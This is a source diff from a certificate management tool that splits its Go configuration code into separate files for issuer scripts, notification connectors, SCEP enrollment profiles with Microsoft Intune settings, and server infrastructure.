||||||
|
|
||||||
|
// CAPool is the Certificate Authority pool name.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_CA_POOL environment variable.
|
||||||
|
CAPool string
|
||||||
|
|
||||||
|
// Credentials is the path to the service account JSON credentials file.
|
||||||
|
// Required for Google CAS integration.
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_CREDENTIALS environment variable.
|
||||||
|
Credentials string
|
||||||
|
|
||||||
|
// TTL is the default certificate time-to-live.
|
||||||
|
// Default: "8760h" (1 year).
|
||||||
|
// Setting: CERTCTL_GOOGLE_CAS_TTL environment variable.
|
||||||
|
TTL string
|
||||||
|
}
|
||||||
|
|
||||||
|
// OpenSSLConfig contains OpenSSL/Custom CA issuer connector configuration.
|
||||||
|
type OpenSSLConfig struct {
|
||||||
|
// SignScript is the path to a shell script that signs certificate requests.
|
||||||
|
// Script receives: CSR_PATH, COMMON_NAME, OUTPUT_CERT_PATH as env vars.
|
||||||
|
// Must output the signed certificate PEM to OUTPUT_CERT_PATH.
|
||||||
|
// Example: /opt/ca-scripts/sign.sh
|
||||||
|
SignScript string
|
||||||
|
|
||||||
|
// RevokeScript is the path to a shell script that revokes certificates.
|
||||||
|
// Script receives: SERIAL_NUMBER, REASON_CODE as env vars.
|
||||||
|
// Best-effort: script failures do not block revocation recording.
|
||||||
|
// Leave empty if revocation is not supported by the custom CA.
|
||||||
|
RevokeScript string
|
||||||
|
|
||||||
|
// CRLScript is the path to a shell script that generates a CRL (Certificate Revocation List).
|
||||||
|
// Script should output the DER-encoded CRL to stdout.
|
||||||
|
// Leave empty if CRL generation is not supported by the custom CA.
|
||||||
|
CRLScript string
|
||||||
|
|
||||||
|
// TimeoutSeconds is the maximum execution time for any shell script invocation.
|
||||||
|
// Default: 30 seconds. Prevents hung processes from blocking certificate operations.
|
||||||
|
TimeoutSeconds int
|
||||||
|
}
|
||||||
@@ -0,0 +1,86 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure (2026-05-14): extracted from config.go to
|
||||||
|
// reduce the change-risk hotspot footprint of the giant config file
|
||||||
|
// (config.go pre-Phase-9 was 3,403 LOC, exceeding the < 500 LOC
|
||||||
|
// target). This file contains the NotifierConfig struct unchanged —
|
||||||
|
// every field, doc-comment, and exported name is byte-identical to
|
||||||
|
// the pre-split form. The struct lives in the same `config` package
|
||||||
|
// so every caller's `config.NotifierConfig` import path is preserved
|
||||||
|
// without modification.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: any code importing
|
||||||
|
// `github.com/certctl-io/certctl/internal/config` reads
|
||||||
|
// `NotifierConfig` the same way before and after this split. The
|
||||||
|
// `go doc internal/config NotifierConfig` output is identical.
|
||||||
|
|
||||||
|
// NotifierConfig contains configuration for notification connectors.
|
||||||
|
// Each notifier is enabled by setting its required env var (webhook URL or API key).
|
||||||
|
type NotifierConfig struct {
|
||||||
|
// SlackWebhookURL is the incoming webhook URL for Slack notifications.
|
||||||
|
// Format: https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
|
||||||
|
// Optional: leave empty to disable Slack notifications.
|
||||||
|
SlackWebhookURL string
|
||||||
|
|
||||||
|
// SlackChannel optionally overrides the default channel in the Slack webhook.
|
||||||
|
// Example: "#alerts" or "@user". Leave empty to use webhook's default channel.
|
||||||
|
SlackChannel string
|
||||||
|
|
||||||
|
// SlackUsername sets the display name for Slack bot messages.
|
||||||
|
// Default: "certctl". Used in webhook message formatting.
|
||||||
|
SlackUsername string
|
||||||
|
|
||||||
|
// TeamsWebhookURL is the incoming webhook URL for Microsoft Teams notifications.
|
||||||
|
// Format: https://outlook.webhook.office.com/webhookb2/...
|
||||||
|
// Optional: leave empty to disable Teams notifications.
|
||||||
|
TeamsWebhookURL string
|
||||||
|
|
||||||
|
// PagerDutyRoutingKey is the integration key for PagerDuty Events API v2.
|
||||||
|
// Obtain from PagerDuty integration settings.
|
||||||
|
// Optional: leave empty to disable PagerDuty notifications.
|
||||||
|
PagerDutyRoutingKey string
|
||||||
|
|
||||||
|
// PagerDutySeverity sets the default severity level for PagerDuty events.
|
||||||
|
// Valid values: "info", "warning", "error", "critical". Default: "warning".
|
||||||
|
PagerDutySeverity string
|
||||||
|
|
||||||
|
// OpsGenieAPIKey is the API key for OpsGenie Alert API v2.
|
||||||
|
// Obtain from OpsGenie organization settings.
|
||||||
|
// Optional: leave empty to disable OpsGenie notifications.
|
||||||
|
OpsGenieAPIKey string
|
||||||
|
|
||||||
|
// OpsGeniePriority sets the default priority for OpsGenie alerts.
|
||||||
|
// Valid values: "P1", "P2", "P3", "P4", "P5". Default: "P3".
|
||||||
|
OpsGeniePriority string
|
||||||
|
|
||||||
|
// SMTPHost is the SMTP server hostname for sending email notifications.
|
||||||
|
// Example: "smtp.gmail.com", "smtp.sendgrid.net". Required for email notifications.
|
||||||
|
// Setting: CERTCTL_SMTP_HOST environment variable.
|
||||||
|
SMTPHost string
|
||||||
|
|
||||||
|
// SMTPPort is the SMTP server port. Default: 587 (STARTTLS).
|
||||||
|
// Common values: 25 (plain), 465 (implicit TLS), 587 (STARTTLS).
|
||||||
|
// Setting: CERTCTL_SMTP_PORT environment variable.
|
||||||
|
SMTPPort int
|
||||||
|
|
||||||
|
// SMTPUsername is the SMTP authentication username.
|
||||||
|
// Setting: CERTCTL_SMTP_USERNAME environment variable.
|
||||||
|
SMTPUsername string
|
||||||
|
|
||||||
|
// SMTPPassword is the SMTP authentication password or app-specific password.
|
||||||
|
// Setting: CERTCTL_SMTP_PASSWORD environment variable.
|
||||||
|
SMTPPassword string
|
||||||
|
|
||||||
|
// SMTPFromAddress is the sender email address for outbound notifications.
|
||||||
|
// Example: "certctl@example.com", "noreply@company.com".
|
||||||
|
// Setting: CERTCTL_SMTP_FROM_ADDRESS environment variable.
|
||||||
|
SMTPFromAddress string
|
||||||
|
|
||||||
|
// SMTPUseTLS enables TLS for the SMTP connection.
|
||||||
|
// Default: true. Set to false for plain SMTP (not recommended).
|
||||||
|
// Setting: CERTCTL_SMTP_USE_TLS environment variable.
|
||||||
|
SMTPUseTLS bool
|
||||||
|
}
|
||||||
@@ -0,0 +1,402 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 3 (2026-05-14): extracted from
|
||||||
|
// config.go. Larger and more complex than Sprints 1+2 because the
|
||||||
|
// SCEP surface has THREE structs AND three helper functions that
|
||||||
|
// move together:
|
||||||
|
//
|
||||||
|
// SCEPConfig — top-level multi-profile config
|
||||||
|
// (Enabled + Profiles slice + the
|
||||||
|
// legacy single-profile flat fields
|
||||||
|
// kept for backward compat).
|
||||||
|
// SCEPProfileConfig — one SCEP endpoint's binding
|
||||||
|
// (PathID + IssuerID + ProfileID +
|
||||||
|
// ChallengePassword + RA cert/key +
|
||||||
|
// mTLS sibling-route gate + per-
|
||||||
|
// profile Intune block).
|
||||||
|
// SCEPIntuneProfileConfig — per-profile Microsoft Intune
|
||||||
|
// Certificate Connector integration
|
||||||
|
// (Enabled, ConnectorCertPath,
|
||||||
|
// Audience, ChallengeValidity,
|
||||||
|
// PerDeviceRateLimit24h,
|
||||||
|
// ClockSkewTolerance).
|
||||||
|
//
|
||||||
|
// loadSCEPProfilesFromEnv — reads CERTCTL_SCEP_PROFILES +
|
||||||
|
// expands each name into a
|
||||||
|
// SCEPProfileConfig via the
|
||||||
|
// CERTCTL_SCEP_PROFILE_<NAME>_*
|
||||||
|
// indexed env-var family.
|
||||||
|
// mergeSCEPLegacyIntoProfiles — backward-compat shim: when
|
||||||
|
// Profiles is empty AND legacy flat
|
||||||
|
// fields are populated, synthesize
|
||||||
|
// Profiles[0] with PathID="" so
|
||||||
|
// /scep dispatches as it did
|
||||||
|
// pre-Phase-1.5.
|
||||||
|
// validSCEPPathID — path-segment validator (ASCII
|
||||||
|
// [a-z0-9-], no leading/trailing
|
||||||
|
// hyphen, empty allowed). Called
|
||||||
|
// from Config.Validate() in
|
||||||
|
// config.go.
|
||||||
|
//
|
||||||
|
// All callers stay in config.go and continue to resolve via
|
||||||
|
// same-package lookup. Specifically:
|
||||||
|
// - Load() calls loadSCEPProfilesFromEnv() during initial cfg.SCEP
|
||||||
|
// construction (currently config.go's Load body)
|
||||||
|
// - Load() calls mergeSCEPLegacyIntoProfiles(&cfg.SCEP) after the
|
||||||
|
// initial profile-load
|
||||||
|
// - Validate() calls validSCEPPathID(p.PathID) per-profile
|
||||||
|
//
|
||||||
|
// The unexported helpers getEnv / getEnvBool / getEnvInt /
|
||||||
|
// getEnvDuration used by loadSCEPProfilesFromEnv also stay in
|
||||||
|
// config.go (shared across every config family); same-package
|
||||||
|
// resolution makes the calls work without any import change.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config SCEPConfig`,
|
||||||
|
// `go doc internal/config SCEPProfileConfig`, and
|
||||||
|
// `go doc internal/config SCEPIntuneProfileConfig` produce
|
||||||
|
// identical output before and after this split. Unexported helpers
|
||||||
|
// are unaffected by `go doc` (which only shows the exported
|
||||||
|
// surface).
|
||||||
|
|
||||||
|
// SCEPConfig controls the RFC 8894 Simple Certificate Enrollment Protocol server.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 1.5: this type was originally a
|
||||||
|
// single flat struct with one IssuerID + one RA pair + one challenge password
|
||||||
|
// (the shape of v2.0.x). Real enterprise deployments need to expose multiple
|
||||||
|
// SCEP endpoints from one certctl instance — corp-laptop CA, server CA, IoT
|
||||||
|
// CA — each with its own issuer + RA pair + challenge password + URL path
|
||||||
|
// (/scep/<pathID>). The Profiles slice carries that. Existing operators see
|
||||||
|
// no behavior change: when Profiles is empty AND the legacy single-profile
|
||||||
|
// fields below are set, Load() synthesizes a single-element Profiles[0]
|
||||||
|
// with PathID="" (which maps to the legacy /scep root path).
|
||||||
|
type SCEPConfig struct {
|
||||||
|
// Enabled controls whether SCEP endpoints are available for device enrollment.
|
||||||
|
// Default: false (SCEP disabled). Set to true to enable SCEP endpoints under /scep/.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// Profiles is the multi-endpoint configuration. Each profile gets its own
|
||||||
|
// URL path (/scep/<PathID>), its own RA cert + key, its own challenge
|
||||||
|
// password, and its own bound issuer. Population sources, in priority order:
|
||||||
|
//
|
||||||
|
// 1. Explicit list via CERTCTL_SCEP_PROFILES (e.g. "corp,iot,server").
|
||||||
|
// 2. Backward-compat shim: when CERTCTL_SCEP_PROFILES is unset AND the
|
||||||
|
// legacy flat fields below have ChallengePassword OR RACertPath set,
|
||||||
|
// Load() synthesizes a single-element Profiles[0] with PathID=""
|
||||||
|
// so /scep continues to route the same way it did pre-Phase-1.5.
|
||||||
|
//
|
||||||
|
// Validate() iterates Profiles and refuses to boot if any profile is
|
||||||
|
// malformed (empty ChallengePassword, missing RA pair, invalid PathID).
|
||||||
|
// Each profile's ChallengePassword + RA pair are independently mandatory
|
||||||
|
// — the profile-load shim never silently borrows from a sibling profile.
|
||||||
|
Profiles []SCEPProfileConfig
|
||||||
|
|
||||||
|
// Legacy single-profile fields — preserved for backward compatibility. New
|
||||||
|
// operators should populate Profiles directly via the indexed env-var form.
|
||||||
|
// These fields are merged into Profiles[0] by Load() when Profiles is
|
||||||
|
// empty AND any of these fields are non-zero.
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector processes SCEP certificate requests
|
||||||
|
// for the legacy single-profile config. Default: "iss-local". Must reference a
|
||||||
|
// configured issuer.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains SCEP enrollments to a specific certificate profile
|
||||||
|
// for the legacy single-profile config. Leave empty to allow SCEP to use any
|
||||||
|
// configured issuer's defaults.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// ChallengePassword is the shared secret used to authenticate SCEP enrollment requests.
|
||||||
|
// Clients include this in the PKCS#10 CSR challengePassword attribute.
|
||||||
|
//
|
||||||
|
// REQUIRED when Enabled is true. Config.Validate() refuses to start the
|
||||||
|
// server if SCEP is enabled and this value is empty (H-2, CWE-306): post-M-001
|
||||||
|
// under option (D), the /scep endpoint rides the no-auth middleware chain per
|
||||||
|
// RFC 8894 §3.2, so the challenge password is the sole application-layer
|
||||||
|
// authentication boundary for SCEP enrollment. An empty shared secret would
|
||||||
|
// allow any client that can reach /scep to enroll a CSR against the configured
|
||||||
|
// issuer. The service-layer PKCSReq path also rejects this configuration
|
||||||
|
// as defense-in-depth.
|
||||||
|
//
|
||||||
|
// Legacy single-profile field; merged into Profiles[0].ChallengePassword by
|
||||||
|
// Load() when Profiles is empty.
|
||||||
|
ChallengePassword string
|
||||||
|
|
||||||
|
// RACertPath is the path to a PEM-encoded RA (Registration Authority)
|
||||||
|
// certificate used by the RFC 8894 SCEP path. SCEP clients encrypt their
|
||||||
|
// PKCS#10 CSR to this cert's public key (via the EnvelopedData wrapper, RFC
|
||||||
|
// 8894 §3.2.2). The certctl server uses RAKeyPath to decrypt inbound
|
||||||
|
// EnvelopedData and to sign outbound CertRep PKIMessage signerInfo (RFC
|
||||||
|
// 8894 §3.3.2).
|
||||||
|
//
|
||||||
|
// Required when Enabled is true; Config.Validate() refuses to start without
|
||||||
|
// it. Without an RA pair the new RFC 8894 path silently falls through to
|
||||||
|
// the MVP raw-CSR path on every request and the operator's intent is
|
||||||
|
// unclear — fail loud at startup instead.
|
||||||
|
//
|
||||||
|
// Generation: a self-signed RA cert with subject "CN=<your-ca-id>-RA" and
|
||||||
|
// the id-kp-emailProtection / id-kp-cmcRA EKU is sufficient. The RA cert
|
||||||
|
// SHOULD be the same cert returned by GetCACert (RFC 8894 §3.5.1) so
|
||||||
|
// clients encrypt to a key the server can decrypt with. See
|
||||||
|
// docs/legacy-est-scep.md for the openssl recipe.
|
||||||
|
RACertPath string
|
||||||
|
|
||||||
|
// RAKeyPath is the path to the PEM-encoded private key matching RACertPath.
|
||||||
|
// File MUST be mode 0600 (owner read/write only); preflight refuses to load
|
||||||
|
// a world-readable RA key as defense-in-depth against credential leak. The
|
||||||
|
// server only ever reads this file at startup; rotation requires a restart
|
||||||
|
// (per the existing CERTCTL_TLS_CERT_PATH precedent in cmd/server/tls.go).
|
||||||
|
//
|
||||||
|
// Legacy single-profile field; merged into Profiles[0].RAKeyPath by
|
||||||
|
// Load() when Profiles is empty.
|
||||||
|
RAKeyPath string
|
||||||
|
}
|
||||||
|
|
||||||
|
// SCEPProfileConfig is one SCEP endpoint's configuration. Each profile is
|
||||||
|
// bound to one issuer + one optional certctl CertificateProfile + one RA
|
||||||
|
// pair + one challenge password (the per-profile Intune trust anchor lands
|
||||||
|
// here in Phase 8 of the master bundle).
|
||||||
|
//
|
||||||
|
// Multi-profile motivation: a real enterprise deployment exposes distinct
|
||||||
|
// SCEP endpoints to distinct fleets — corp-laptop CA bound to one issuer
|
||||||
|
// with one challenge password; IoT CA bound to a different issuer with a
|
||||||
|
// different challenge password — so a single set of credentials can never
|
||||||
|
// enroll across CA boundaries by accident. Each SCEPProfileConfig drives
|
||||||
|
// a separate handler + service instance built at server startup.
|
||||||
|
type SCEPProfileConfig struct {
|
||||||
|
// PathID is the URL segment after /scep/. Empty string maps to the legacy
|
||||||
|
// /scep root for backward compatibility (so existing operators with the
|
||||||
|
// flat single-profile config see no URL change). Non-empty values MUST
|
||||||
|
// be a single path-safe slug ([a-z0-9-], no slashes); validated at
|
||||||
|
// startup by Config.Validate(). Multi-profile deployments typically use
|
||||||
|
// short tokens like "corp", "iot", "server" — the URL becomes
|
||||||
|
// /scep/corp, /scep/iot, /scep/server.
|
||||||
|
PathID string
|
||||||
|
|
||||||
|
// IssuerID selects which issuer connector this profile's enrollments go
|
||||||
|
// through. Must reference a configured issuer.
|
||||||
|
IssuerID string
|
||||||
|
|
||||||
|
// ProfileID optionally constrains enrollments under this PathID to a
|
||||||
|
// specific CertificateProfile. Leave empty to allow the issuer's defaults.
|
||||||
|
ProfileID string
|
||||||
|
|
||||||
|
// ChallengePassword is the per-profile shared secret. Same constant-time
|
||||||
|
// compare semantics as the flat field; empty value at validate time fails
|
||||||
|
// the boot.
|
||||||
|
ChallengePassword string
|
||||||
|
|
||||||
|
// RACertPath / RAKeyPath are the per-profile RA pair used by the RFC 8894
|
||||||
|
// EnvelopedData decryption + CertRep signing path. Same preflight semantics
|
||||||
|
// as the legacy flat fields (file existence, key mode 0600, cert/key
|
||||||
|
// match, expiry, RSA-or-ECDSA alg).
|
||||||
|
RACertPath string
|
||||||
|
RAKeyPath string
|
||||||
|
|
||||||
|
// MTLSEnabled gates the sibling `/scep-mtls/<PathID>` route. When true,
|
||||||
|
// the route requires a client cert that chains to one of the certs in
|
||||||
|
// MTLSClientCATrustBundlePath. The standard `/scep[/<PathID>]` route
|
||||||
|
// remains application-layer-auth (challenge password) so existing
|
||||||
|
// clients keep working — mTLS is additive, not replacement.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 6.5: enterprise procurement
|
||||||
|
// teams routinely reject 'shared password authentication' as a checkbox-
|
||||||
|
// fail regardless of how strong the password is. This flag wires up a
|
||||||
|
// sibling route that adds client-cert auth at the handler layer AND keeps
|
||||||
|
// the challenge password (defense in depth, not replacement). Devices
|
||||||
|
// present a bootstrap cert from a trusted CA (e.g. a manufacturing-time
|
||||||
|
// cert), then SCEP-enroll for their long-lived cert. Same model Apple's
|
||||||
|
// MDM and Cisco's BRSKI use.
|
||||||
|
MTLSEnabled bool
|
||||||
|
|
||||||
|
// MTLSClientCATrustBundlePath is the PEM bundle of CA certs that sign
|
||||||
|
// the client (device-bootstrap) certs the operator allows to enroll.
|
||||||
|
// Required when MTLSEnabled is true. Operators with multiple bootstrap
|
||||||
|
// CAs concatenate them. Validated at startup by
|
||||||
|
// `cmd/server/main.go::preflightSCEPMTLSTrustBundle` — file exists,
|
||||||
|
// parses as PEM, contains ≥1 cert, none expired.
|
||||||
|
MTLSClientCATrustBundlePath string
|
||||||
|
|
||||||
|
// Intune is the per-profile Microsoft Intune Certificate Connector
|
||||||
|
// integration block. When Enabled is false (default), this profile only
|
||||||
|
// honors the static ChallengePassword; when true, requests with an
|
||||||
|
// Intune-shaped challenge password (length + dot-count heuristic) are
|
||||||
|
// routed to the Intune dynamic-challenge validator.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 8.8: per-profile dispatch
|
||||||
|
// is what makes the heterogeneous-fleet story work — an operator
|
||||||
|
// running corp-laptops via Intune AND IoT devices via static challenge
|
||||||
|
// configures Intune-mode on the corp profile only; the IoT profile's
|
||||||
|
// PKCSReq path skips the Intune dispatcher entirely.
|
||||||
|
Intune SCEPIntuneProfileConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// SCEPIntuneProfileConfig holds the Microsoft Intune Certificate Connector
// settings that hang off a single SCEPProfileConfig.
//
// SCEP RFC 8894 + Intune master bundle Phase 8.1.
//
// Every field is sourced from a CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_* env var
// (for example CERTCTL_SCEP_PROFILE_CORP_INTUNE_ENABLED=true). Because the
// block is per-profile, an operator running two Intune-backed profiles
// (say corp + iot) can pin distinct Connectors, audiences, and rate limits
// per fleet.
type SCEPIntuneProfileConfig struct {
	// Enabled switches on the Intune dynamic-challenge validation path for
	// this profile. False (the default) means only the static
	// ChallengePassword is honored; true turns ConnectorCertPath into a
	// required boot gate.
	Enabled bool

	// ConnectorCertPath points at a PEM bundle holding one or more
	// Microsoft Intune Certificate Connector signing certs. It is required
	// when Enabled=true and is reloaded on SIGHUP via the per-profile
	// TrustAnchorHolder wired in cmd/server/main.go.
	ConnectorCertPath string

	// Audience is the "aud" claim value expected in the Intune challenge,
	// typically the public SCEP endpoint URL the Connector is configured
	// to call (e.g. "https://certctl.example.com/scep/corp"). The default
	// is empty, which disables the audience check; that suits proxy /
	// load-balancer deployments where the URL the Connector saw is not
	// the URL this server sees. Pinning a public URL here adds
	// defense-in-depth against challenge re-use across endpoints.
	Audience string

	// ChallengeValidity is an upper bound on the age of an Intune
	// challenge, applied in addition to the challenge's own iat/exp
	// claims. The default is 60 minutes, per Microsoft's published
	// Connector defaults; a stricter cap shrinks the replay window for a
	// stolen challenge. Zero means "use Connector's exp claim only" (no
	// extra cap).
	ChallengeValidity time.Duration

	// PerDeviceRateLimit24h limits how many enrollments a single
	// (claim.Subject, claim.Issuer) pair may perform in any rolling
	// 24-hour window. The default of 3 covers a legitimate first cert,
	// a recovery, and a post-wipe re-enrollment, while blocking
	// bulk-enumeration from a compromised Connector signing key. Zero
	// means "unlimited" (defense-in-depth disabled; not recommended for
	// production).
	PerDeviceRateLimit24h int

	// ClockSkewTolerance widens the iat/exp validation window by
	// ±|tolerance| so that modest clock drift between the Microsoft
	// Intune Certificate Connector and the certctl host is absorbed.
	// The default is 60s per master prompt §15 ("known hazards").
	// Tightly time-synced fleets can set it to zero for strict iat/exp
	// checks; loosely synced fleets (e.g. field devices with no NTP) may
	// raise it to 5m. Validate() refuses any tolerance ≥
	// ChallengeValidity, because that would make the per-profile
	// validity cap meaningless. Source env var:
	// CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CLOCK_SKEW_TOLERANCE.
	ClockSkewTolerance time.Duration
}
|
||||||
|
|
||||||
|
// loadSCEPProfilesFromEnv reads the indexed CERTCTL_SCEP_PROFILES env var
|
||||||
|
// (e.g. "corp,iot,server") and expands each name into a SCEPProfileConfig
|
||||||
|
// populated from CERTCTL_SCEP_PROFILE_<NAME>_*. Returns nil when the
|
||||||
|
// CERTCTL_SCEP_PROFILES env var is unset or empty — in that case the
|
||||||
|
// legacy-shim path (mergeSCEPLegacyIntoProfiles, called from Load after the
|
||||||
|
// initial config build) populates Profiles[0] from the flat fields if needed.
|
||||||
|
//
|
||||||
|
// PathID for each profile is the lowercased trimmed name from the
|
||||||
|
// CERTCTL_SCEP_PROFILES list (e.g. "Corp" -> "corp"). Validation that the
|
||||||
|
// PathID is path-safe ([a-z0-9-]+) lives in Config.Validate() so the loader
|
||||||
|
// can stay free of error returns.
|
||||||
|
func loadSCEPProfilesFromEnv() []SCEPProfileConfig {
|
||||||
|
raw := strings.TrimSpace(os.Getenv("CERTCTL_SCEP_PROFILES"))
|
||||||
|
if raw == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
names := strings.Split(raw, ",")
|
||||||
|
out := make([]SCEPProfileConfig, 0, len(names))
|
||||||
|
for _, n := range names {
|
||||||
|
n = strings.TrimSpace(n)
|
||||||
|
if n == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
// The env-var key is the upper-cased name (CERTCTL_SCEP_PROFILE_CORP_*),
|
||||||
|
// but the URL path segment is the lower-cased name to match the
|
||||||
|
// path-safe slug constraint enforced in Validate.
|
||||||
|
envName := strings.ToUpper(n)
|
||||||
|
pathID := strings.ToLower(n)
|
||||||
|
out = append(out, SCEPProfileConfig{
|
||||||
|
PathID: pathID,
|
||||||
|
IssuerID: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_ISSUER_ID", ""),
|
||||||
|
ProfileID: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_PROFILE_ID", ""),
|
||||||
|
ChallengePassword: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_CHALLENGE_PASSWORD", ""),
|
||||||
|
RACertPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_RA_CERT_PATH", ""),
|
||||||
|
RAKeyPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_RA_KEY_PATH", ""),
|
||||||
|
// SCEP RFC 8894 Phase 6.5: opt-in mTLS sibling route.
|
||||||
|
MTLSEnabled: getEnvBool("CERTCTL_SCEP_PROFILE_"+envName+"_MTLS_ENABLED", false),
|
||||||
|
MTLSClientCATrustBundlePath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH", ""),
|
||||||
|
// SCEP RFC 8894 Phase 8.1: per-profile Intune Connector dispatch.
|
||||||
|
Intune: SCEPIntuneProfileConfig{
|
||||||
|
Enabled: getEnvBool("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_ENABLED", false),
|
||||||
|
ConnectorCertPath: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CONNECTOR_CERT_PATH", ""),
|
||||||
|
Audience: getEnv("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_AUDIENCE", ""),
|
||||||
|
ChallengeValidity: getEnvDuration("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CHALLENGE_VALIDITY", 60*time.Minute),
|
||||||
|
PerDeviceRateLimit24h: getEnvInt("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_PER_DEVICE_RATE_LIMIT_24H", 3),
|
||||||
|
ClockSkewTolerance: getEnvDuration("CERTCTL_SCEP_PROFILE_"+envName+"_INTUNE_CLOCK_SKEW_TOLERANCE", 60*time.Second),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
// mergeSCEPLegacyIntoProfiles is the backward-compat shim. When Profiles is
|
||||||
|
// empty AND any legacy single-profile field is populated, synthesise a
|
||||||
|
// single-element Profiles[0] with PathID="" so /scep dispatches identically
|
||||||
|
// to the pre-Phase-1.5 deploy. No-op when Profiles is non-empty (the operator
|
||||||
|
// explicitly opted into the structured form via CERTCTL_SCEP_PROFILES) or
|
||||||
|
// when SCEP is disabled.
|
||||||
|
//
|
||||||
|
// "Any legacy field populated" means at least one of ChallengePassword,
|
||||||
|
// RACertPath, RAKeyPath is non-empty. IssuerID has a non-empty default
|
||||||
|
// ("iss-local") so it can't be the trigger; ProfileID is optional. The
|
||||||
|
// trigger set matches what the Validate() refuse cares about.
|
||||||
|
func mergeSCEPLegacyIntoProfiles(c *SCEPConfig) {
|
||||||
|
if c == nil || !c.Enabled || len(c.Profiles) > 0 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
hasLegacy := c.ChallengePassword != "" || c.RACertPath != "" || c.RAKeyPath != ""
|
||||||
|
if !hasLegacy {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
c.Profiles = []SCEPProfileConfig{{
|
||||||
|
PathID: "", // empty pathID maps to the legacy /scep root
|
||||||
|
IssuerID: c.IssuerID,
|
||||||
|
ProfileID: c.ProfileID,
|
||||||
|
ChallengePassword: c.ChallengePassword,
|
||||||
|
RACertPath: c.RACertPath,
|
||||||
|
RAKeyPath: c.RAKeyPath,
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
// validSCEPPathID reports whether s may be used as a SCEP profile path
// segment.
//
// The empty string is accepted (it denotes the legacy root /scep). Any other
// value must consist solely of ASCII lowercase letters, digits, and hyphens,
// and must neither start nor end with a hyphen. The restriction keeps URL
// construction trivial at the router layer and avoids percent-encoding
// surprises for SCEP clients that build the URL by string concatenation
// rather than url.PathEscape.
func validSCEPPathID(s string) bool {
	n := len(s)
	if n == 0 {
		return true // empty maps to legacy /scep root
	}
	if s[0] == '-' || s[n-1] == '-' {
		return false
	}
	// Byte-wise scan: any byte outside [a-z0-9-] (including every byte of a
	// multi-byte UTF-8 sequence) rejects the whole string.
	for i := 0; i < n; i++ {
		switch b := s[i]; {
		case b >= 'a' && b <= 'z':
		case b >= '0' && b <= '9':
		case b == '-':
		default:
			return false
		}
	}
	return true
}
|
||||||
@@ -0,0 +1,414 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"net"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 6 (2026-05-14): extracted from
|
||||||
|
// config.go. Sprint 6 groups the server-tier infrastructure structs
|
||||||
|
// — the things that configure HOW the server runs (HTTP listener,
|
||||||
|
// TLS, DB pool, scheduler loops, log level, rate limiting, CORS)
|
||||||
|
// rather than WHAT it serves (issuer configs, ACME, SCEP, EST,
|
||||||
|
// auth identity).
|
||||||
|
//
|
||||||
|
// Seven structs + one unexported helper move:
|
||||||
|
//
|
||||||
|
// ServerConfig — HTTP listener (Host, Port, MaxBodySize,
|
||||||
|
// TLS sub-struct, AuditFlushTimeoutSeconds).
|
||||||
|
// ServerTLSConfig — HTTPS-only TLS material (CertPath +
|
||||||
|
// KeyPath). HTTPS-everywhere milestone: no
|
||||||
|
// plaintext fallback, no dual-listener.
|
||||||
|
// DatabaseConfig — DB connection + pool settings + DemoSeed
|
||||||
|
// toggle for the compose demo overlay.
|
||||||
|
// SchedulerConfig — all 15 scheduler-loop tunables + the
|
||||||
|
// per-tick concurrency cap + the deploy/
|
||||||
|
// connector timeouts that ride the same
|
||||||
|
// env-var family.
|
||||||
|
// LogConfig — Level + Format (info/json defaults).
|
||||||
|
// RateLimitConfig — Bundle B / M-025: per-key token bucket
|
||||||
|
// with separate IP-keyed + user-keyed
|
||||||
|
// budgets.
|
||||||
|
// CORSConfig — AllowedOrigins (deny-by-default empty).
|
||||||
|
//
|
||||||
|
